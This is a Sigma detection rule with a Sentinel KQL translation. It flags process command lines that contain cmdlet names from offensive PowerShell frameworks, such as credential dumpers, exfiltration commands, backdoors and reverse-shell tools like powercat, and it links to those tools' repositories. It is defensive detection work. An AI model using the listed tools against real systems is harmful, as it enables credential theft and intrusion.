Detects Commandlet names from well-known PowerShell exploitation frameworks
title: Malicious PowerShell Commandlets - ProcessCreation
id: 02030f2f-6199-49ec-b258-ea71b07e03dc
related:
- id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
type: derived
- id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
type: similar
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
- https://adsecurity.org/?p=2921
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
- https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
- https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
- https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
- https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
- https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
- https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
- https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
- https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
- https://github.com/HarmJ0y/DAMP
- https://github.com/samratashok/nishang
- https://github.com/DarkCoderSc/PowerRunAsSystem/
- https://github.com/besimorhino/powercat
- https://github.com/Kevin-Robertson/Powermad
- https://github.com/adrecon/ADRecon
- https://github.com/adrecon/AzureADRecon
- https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
- https://github.com/The-Viper-One/Invoke-PowerDPAPI/
- https://github.com/Arno0x/DNSExfiltrator/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-02
modified: 2025-12-10
tags:
- attack.execution
- attack.discovery
- attack.t1482
- attack.t1087
- attack.t1087.001
- attack.t1087.002
- attack.t1069.001
- attack.t1069.002
- attack.t1069
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
# Note: Please ensure alphabetical order when adding new entries
CommandLine|contains:
- 'Add-Exfiltration'
- 'Add-Persistence'
- 'Add-RegBackdoor'
- 'Add-RemoteRegBackdoor'
- 'Add-ScrnSaveBackdoor'
- 'Check-VM'
- 'ConvertTo-Rc4ByteStream'
- 'Decrypt-Hash'
- 'Disable-ADIDNSNode'
- 'Disable-MachineAccount'
- 'Do-Exfiltration'
- 'Enable-ADIDNSNode'
- 'Enable-MachineAccount'
- 'Enabled-DuplicateToken'
- 'Exploit-Jboss'
- 'Export-ADR'
- 'Export-ADRCSV'
- 'Export-ADRExcel'
- 'Export-ADRHTML'
- 'Export-ADRJSON'
- 'Export-ADRXML'
- 'Find-Fruit'
- 'Find-GPOLocation'
- 'Find-TrustedDocuments'
- 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone
- 'Get-ApplicationHost'
- 'Get-ChromeDump'
- 'Get-ClipboardContents'
- 'Get-FoxDump'
- 'Get-GPPPassword'
- 'Get-IndexedItem'
- 'Get-KerberosAESKey'
- 'Get-Keystrokes'
- 'Get-LSASecret'
- 'Get-MachineAccountAttribute'
- 'Get-MachineAccountCreator'
- 'Get-PassHashes'
- 'Get-RegAlwaysInstallElevated'
- 'Get-RegAutoLogon'
- 'Get-RemoteBootKey'
- 'Get-RemoteCachedCredential'
- 'Get-RemoteLocalAccountHash'
- 'Get-RemoteLSAKey'
- 'Get-RemoteMachineAccountHash'
- 'Get-RemoteNLKMKey'
- 'Get-RickAstley'
- 'Get-Screenshot'
- 'Get-SecurityPackages'
- 'Get-ServiceFilePermission'
- 'Get-ServicePermission'
- 'Get-ServiceUnquoted'
- 'Get-SiteListPassword'
- 'Get-System'
- 'Get-TimedScreenshot'
- 'Get-UnattendedInstallFile'
- 'Get-Unconstrained'
- 'Get-USBKeystrokes'
- 'Get-VaultCredential'
- 'Get-VulnAutoRun'
- 'Get-VulnSchTask'
- 'Grant-ADIDNSPermission'
- 'Gupt-Backdoor'
- 'HTTP-Login'
- 'Install-ServiceBinary'
- 'Install-SSP'
- 'Invoke-ACLScanner'
- 'Invoke-ADRecon'
- 'Invoke-ADSBackdoor'
- 'Invoke-AgentSmith'
- 'Invoke-AllChecks'
- 'Invoke-ARPScan'
- 'Invoke-AzureHound'
- 'Invoke-BackdoorLNK'
- 'Invoke-BadPotato'
- 'Invoke-BetterSafetyKatz'
- 'Invoke-BypassUAC'
- 'Invoke-Carbuncle'
- 'Invoke-Certify'
- 'Invoke-ConPtyShell'
- 'Invoke-CredentialInjection'
- 'Invoke-DAFT'
- 'Invoke-DCSync'
- 'Invoke-DinvokeKatz'
- 'Invoke-DllInjection'
- 'Invoke-DNSUpdate'
- 'Invoke-DNSExfiltrator'
- 'Invoke-DomainPasswordSpray'
- 'Invoke-DowngradeAccount'
- 'Invoke-EgressCheck'
- 'Invoke-Eyewitness'
- 'Invoke-FakeLogonScreen'
- 'Invoke-Farmer'
- 'Invoke-Get-RBCD-Threaded'
- 'Invoke-Gopher'
- 'Invoke-Grouper' # Also Covers Invoke-GrouperX
- 'Invoke-HandleKatz'
- 'Invoke-ImpersonatedProcess'
- 'Invoke-ImpersonateSystem'
- 'Invoke-InteractiveSystemPowerShell'
- 'Invoke-Internalmonologue'
- 'Invoke-Inveigh'
- 'Invoke-InveighRelay'
- 'Invoke-KrbRelay'
- 'Invoke-LdapSignCheck'
- 'Invoke-Lockless'
- 'Invoke-MalSCCM'
- 'Invoke-Mimikatz'
- 'Invoke-Mimikittenz'
- 'Invoke-MITM6'
- 'Invoke-NanoDump'
- 'Invoke-NetRipper'
- 'Invoke-Nightmare'
- 'Invoke-NinjaCopy'
- 'Invoke-OfficeScrape'
- 'Invoke-OxidResolver'
- 'Invoke-P0wnedshell'
- 'Invoke-Paranoia'
- 'Invoke-PortScan'
- 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
- 'Invoke-PostExfil'
- 'Invoke-PowerDump'
- 'Invoke-PowerDPAPI'
- 'Invoke-PowerShellTCP'
- 'Invoke-PowerShellWMI'
- 'Invoke-PPLDump'
- 'Invoke-PsExec'
- 'Invoke-PSInject'
- 'Invoke-PsUaCme'
- 'Invoke-ReflectivePEInjection'
- 'Invoke-ReverseDNSLookup'
- 'Invoke-Rubeus'
- 'Invoke-RunAs'
- 'Invoke-SafetyKatz'
- 'Invoke-SauronEye'
- 'Invoke-SCShell'
- 'Invoke-Seatbelt'
- 'Invoke-ServiceAbuse'
- 'Invoke-ShadowSpray'
- 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
- 'Invoke-Shellcode'
- 'Invoke-SMBScanner'
- 'Invoke-Snaffler'
- 'Invoke-Spoolsample'
- 'Invoke-SpraySinglePassword'
- 'Invoke-SSHCommand'
- 'Invoke-StandIn'
- 'Invoke-StickyNotesExtract'
- 'Invoke-SystemCommand'
- 'Invoke-Tasksbackdoor'
- 'Invoke-Tater'
- 'Invoke-Thunderfox'
- 'Invoke-ThunderStruck'
- 'Invoke-TokenManipulation'
- 'Invoke-Tokenvator'
- 'Invoke-TotalExec'
- 'Invoke-UrbanBishop'
- 'Invoke-UserHunter'
- 'Invoke-VoiceTroll'
- 'Invoke-Whisker'
- 'Invoke-WinEnum'
- 'Invoke-winPEAS'
- 'Invoke-WireTap'
- 'Invoke-WmiCommand'
- 'Invoke-WMIExec'
- 'Invoke-WScriptBypassUAC'
- 'Invoke-Zerologon'
- 'MailRaider'
- 'New-ADIDNSNode'
- 'New-DNSRecordArray'
- 'New-HoneyHash'
- 'New-InMemoryModule'
- 'New-MachineAccount'
- 'New-SOASerialNumberArray'
- 'Out-Minidump'
- 'Port-Scan'
- 'PowerBreach'
- 'powercat '
- 'PowerUp'
- 'PowerView'
- 'Remove-ADIDNSNode'
- 'Remove-MachineAccount'
- 'Remove-Update'
- 'Rename-ADIDNSNode'
- 'Revoke-ADIDNSPermission'
- 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
- 'Set-MacAttribute'
- 'Set-MachineAccountAttribute'
- 'Set-Wallpaper'
- 'Show-TargetScreen'
- 'Start-CaptureServer'
- 'Start-Dnscat2'
- 'Start-WebcamRecorder'
- 'Veeam-Get-Creds'
- 'VolumeShadowCopyTools'
condition: selection
falsepositives:
- Unknown
level: high
imProcessCreate
| where TargetProcessCommandLine contains "Add-Exfiltration" or TargetProcessCommandLine contains "Add-Persistence" or TargetProcessCommandLine contains "Add-RegBackdoor" or TargetProcessCommandLine contains "Add-RemoteRegBackdoor" or TargetProcessCommandLine contains "Add-ScrnSaveBackdoor" or TargetProcessCommandLine contains "Check-VM" or TargetProcessCommandLine contains "ConvertTo-Rc4ByteStream" or TargetProcessCommandLine contains "Decrypt-Hash" or TargetProcessCommandLine contains "Disable-ADIDNSNode" or TargetProcessCommandLine contains "Disable-MachineAccount" or TargetProcessCommandLine contains "Do-Exfiltration" or TargetProcessCommandLine contains "Enable-ADIDNSNode" or TargetProcessCommandLine contains "Enable-MachineAccount" or TargetProcessCommandLine contains "Enabled-DuplicateToken" or TargetProcessCommandLine contains "Exploit-Jboss" or TargetProcessCommandLine contains "Export-ADR" or TargetProcessCommandLine contains "Export-ADRCSV" or TargetProcessCommandLine contains "Export-ADRExcel" or TargetProcessCommandLine contains "Export-ADRHTML" or TargetProcessCommandLine contains "Export-ADRJSON" or TargetProcessCommandLine contains "Export-ADRXML" or TargetProcessCommandLine contains "Find-Fruit" or TargetProcessCommandLine contains "Find-GPOLocation" or TargetProcessCommandLine contains "Find-TrustedDocuments" or TargetProcessCommandLine contains "Get-ADIDNS" or TargetProcessCommandLine contains "Get-ApplicationHost" or TargetProcessCommandLine contains "Get-ChromeDump" or TargetProcessCommandLine contains "Get-ClipboardContents" or TargetProcessCommandLine contains "Get-FoxDump" or TargetProcessCommandLine contains "Get-GPPPassword" or TargetProcessCommandLine contains "Get-IndexedItem" or TargetProcessCommandLine contains "Get-KerberosAESKey" or TargetProcessCommandLine contains "Get-Keystrokes" or TargetProcessCommandLine contains "Get-LSASecret" or TargetProcessCommandLine contains "Get-MachineAccountAttribute" or TargetProcessCommandLine contains "Get-MachineAccountCreator" or TargetProcessCommandLine contains "Get-PassHashes" or TargetProcessCommandLine contains "Get-RegAlwaysInstallElevated" or TargetProcessCommandLine contains "Get-RegAutoLogon" or TargetProcessCommandLine contains "Get-RemoteBootKey" or TargetProcessCommandLine contains "Get-RemoteCachedCredential" or TargetProcessCommandLine contains "Get-RemoteLocalAccountHash" or TargetProcessCommandLine contains "Get-RemoteLSAKey" or TargetProcessCommandLine contains "Get-RemoteMachineAccountHash" or TargetProcessCommandLine contains "Get-RemoteNLKMKey" or TargetProcessCommandLine contains "Get-RickAstley" or TargetProcessCommandLine contains "Get-Screenshot" or TargetProcessCommandLine contains "Get-SecurityPackages" or TargetProcessCommandLine contains "Get-ServiceFilePermission" or TargetProcessCommandLine contains "Get-ServicePermission" or TargetProcessCommandLine contains "Get-ServiceUnquoted" or TargetProcessCommandLine contains "Get-SiteListPassword" or TargetProcessCommandLine contains "Get-System" or TargetProcessCommandLine contains "Get-TimedScreenshot" or TargetProcessCommandLine contains "Get-UnattendedInstallFile" or TargetProcessCommandLine contains "Get-Unconstrained" or TargetProcessCommandLine contains "Get-USBKeystrokes" or TargetProcessCommandLine contains "Get-VaultCredential" or TargetProcessCommandLine contains "Get-VulnAutoRun" or TargetProcessCommandLine contains "Get-VulnSchTask" or TargetProcessCommandLine contains "Grant-ADIDNSPermission" or TargetProcessCommandLine contains "Gupt-Backdoor" or TargetProcessCommandLine contains "HTTP-Login" or TargetProcessCommandLine contains "Install-ServiceBinary" or TargetProcessCommandLine contains "Install-SSP" or TargetProcessCommandLine contains "Invoke-ACLScanner" or TargetProcessCommandLine contains "Invoke-ADRecon" or TargetProcessCommandLine contains "Invoke-ADSBackdoor" or TargetProcessCommandLine contains "Invoke-AgentSmith" or TargetProcessCommandLine contains "Invoke-AllChecks" or TargetProcessCommandLine contains "Invoke-ARPScan" or TargetProcessCommandLine contains "Invoke-AzureHound" or TargetProcessCommandLine contains "Invoke-BackdoorLNK" or TargetProcessCommandLine contains "Invoke-BadPotato" or TargetProcessCommandLine contains "Invoke-BetterSafetyKatz" or TargetProcessCommandLine contains "Invoke-BypassUAC" or TargetProcessCommandLine contains "Invoke-Carbuncle" or TargetProcessCommandLine contains "Invoke-Certify" or TargetProcessCommandLine contains "Invoke-ConPtyShell" or TargetProcessCommandLine contains "Invoke-CredentialInjection" or TargetProcessCommandLine contains "Invoke-DAFT" or TargetProcessCommandLine contains "Invoke-DCSync" or TargetProcessCommandLine contains "Invoke-DinvokeKatz" or TargetProcessCommandLine contains "Invoke-DllInjection" or TargetProcessCommandLine contains "Invoke-DNSUpdate" or TargetProcessCommandLine contains "Invoke-DNSExfiltrator" or TargetProcessCommandLine contains "Invoke-DomainPasswordSpray" or TargetProcessCommandLine contains "Invoke-DowngradeAccount" or TargetProcessCommandLine contains "Invoke-EgressCheck" or TargetProcessCommandLine contains "Invoke-Eyewitness" or TargetProcessCommandLine contains "Invoke-FakeLogonScreen" or TargetProcessCommandLine contains "Invoke-Farmer" or TargetProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or TargetProcessCommandLine contains "Invoke-Gopher" or TargetProcessCommandLine contains "Invoke-Grouper" or TargetProcessCommandLine contains "Invoke-HandleKatz" or TargetProcessCommandLine contains "Invoke-ImpersonatedProcess" or TargetProcessCommandLine contains "Invoke-ImpersonateSystem" or TargetProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or TargetProcessCommandLine contains "Invoke-Internalmonologue" or TargetProcessCommandLine contains "Invoke-Inveigh" or TargetProcessCommandLine contains "Invoke-InveighRelay" or TargetProcessCommandLine contains "Invoke-KrbRelay" or TargetProcessCommandLine contains "Invoke-LdapSignCheck" or TargetProcessCommandLine contains "Invoke-Lockless" or TargetProcessCommandLine contains "Invoke-MalSCCM" or TargetProcessCommandLine contains "Invoke-Mimikatz" or TargetProcessCommandLine contains "Invoke-Mimikittenz" or TargetProcessCommandLine contains "Invoke-MITM6" or TargetProcessCommandLine contains "Invoke-NanoDump" or TargetProcessCommandLine contains "Invoke-NetRipper" or TargetProcessCommandLine contains "Invoke-Nightmare" or TargetProcessCommandLine contains "Invoke-NinjaCopy" or TargetProcessCommandLine contains "Invoke-OfficeScrape" or TargetProcessCommandLine contains "Invoke-OxidResolver" or TargetProcessCommandLine contains "Invoke-P0wnedshell" or TargetProcessCommandLine contains "Invoke-Paranoia" or TargetProcessCommandLine contains "Invoke-PortScan" or TargetProcessCommandLine contains "Invoke-PoshRatHttp" or TargetProcessCommandLine contains "Invoke-PostExfil" or TargetProcessCommandLine contains "Invoke-PowerDump" or TargetProcessCommandLine contains "Invoke-PowerDPAPI" or TargetProcessCommandLine contains "Invoke-PowerShellTCP" or TargetProcessCommandLine contains "Invoke-PowerShellWMI" or TargetProcessCommandLine contains "Invoke-PPLDump" or TargetProcessCommandLine contains "Invoke-PsExec" or TargetProcessCommandLine contains "Invoke-PSInject" or TargetProcessCommandLine contains "Invoke-PsUaCme" or TargetProcessCommandLine contains "Invoke-ReflectivePEInjection" or TargetProcessCommandLine contains "Invoke-ReverseDNSLookup" or TargetProcessCommandLine contains "Invoke-Rubeus" or TargetProcessCommandLine contains "Invoke-RunAs" or TargetProcessCommandLine contains "Invoke-SafetyKatz" or TargetProcessCommandLine contains "Invoke-SauronEye" or TargetProcessCommandLine contains "Invoke-SCShell" or TargetProcessCommandLine contains "Invoke-Seatbelt" or TargetProcessCommandLine contains "Invoke-ServiceAbuse" or TargetProcessCommandLine contains "Invoke-ShadowSpray" or TargetProcessCommandLine contains "Invoke-Sharp" or TargetProcessCommandLine contains "Invoke-Shellcode" or TargetProcessCommandLine contains "Invoke-SMBScanner" or TargetProcessCommandLine contains "Invoke-Snaffler" or TargetProcessCommandLine contains "Invoke-Spoolsample" or TargetProcessCommandLine contains "Invoke-SpraySinglePassword" or TargetProcessCommandLine contains "Invoke-SSHCommand" or TargetProcessCommandLine contains "Invoke-StandIn" or TargetProcessCommandLine contains "Invoke-StickyNotesExtract" or TargetProcessCommandLine contains "Invoke-SystemCommand" or TargetProcessCommandLine contains "Invoke-Tasksbackdoor" or TargetProcessCommandLine contains "Invoke-Tater" or TargetProcessCommandLine contains "Invoke-Thunderfox" or TargetProcessCommandLine contains "Invoke-ThunderStruck" or TargetProcessCommandLine contains "Invoke-TokenManipulation" or TargetProcessCommandLine contains "Invoke-Tokenvator" or TargetProcessCommandLine contains "Invoke-TotalExec" or TargetProcessCommandLine contains "Invoke-UrbanBishop" or TargetProcessCommandLine contains "Invoke-UserHunter" or TargetProcessCommandLine contains "Invoke-VoiceTroll" or TargetProcessCommandLine contains "Invoke-Whisker" or TargetProcessCommandLine contains "Invoke-WinEnum" or TargetProcessCommandLine contains "Invoke-winPEAS" or TargetProcessCommandLine contains "Invoke-WireTap" or TargetProcessCommandLine contains "Invoke-WmiCommand" or TargetProcessCommandLine contains "Invoke-WMIExec" or TargetProcessCommandLine contains "Invoke-WScriptBypassUAC" or TargetProcessCommandLine contains "Invoke-Zerologon" or TargetProcessCommandLine contains "MailRaider" or TargetProcessCommandLine contains "New-ADIDNSNode" or TargetProcessCommandLine contains "New-DNSRecordArray" or TargetProcessCommandLine contains "New-HoneyHash" or TargetProcessCommandLine contains "New-InMemoryModule" or TargetProcessCommandLine contains "New-MachineAccount" or TargetProcessCommandLine contains "New-SOASerialNumberArray" or TargetProcessCommandLine contains "Out-Minidump" or TargetProcessCommandLine contains "Port-Scan" or TargetProcessCommandLine contains "PowerBreach" or TargetProcessCommandLine contains "powercat " or TargetProcessCommandLine contains "PowerUp" or TargetProcessCommandLine contains "PowerView" or TargetProcessCommandLine contains "Remove-ADIDNSNode" or TargetProcessCommandLine contains "Remove-MachineAccount" or TargetProcessCommandLine contains "Remove-Update" or TargetProcessCommandLine contains "Rename-ADIDNSNode" or TargetProcessCommandLine contains "Revoke-ADIDNSPermission" or TargetProcessCommandLine contains "Set-ADIDNSNode" or TargetProcessCommandLine contains "Set-MacAttribute" or TargetProcessCommandLine contains "Set-MachineAccountAttribute" or TargetProcessCommandLine contains "Set-Wallpaper" or TargetProcessCommandLine contains "Show-TargetScreen" or TargetProcessCommandLine contains "Start-CaptureServer" or TargetProcessCommandLine contains "Start-Dnscat2" or TargetProcessCommandLine contains "Start-WebcamRecorder" or TargetProcessCommandLine contains "Veeam-Get-Creds" or TargetProcessCommandLine contains "VolumeShadowCopyTools"| Sentinel Table | Notes |
|---|---|
imProcessCreate | Ensure this data connector is enabled |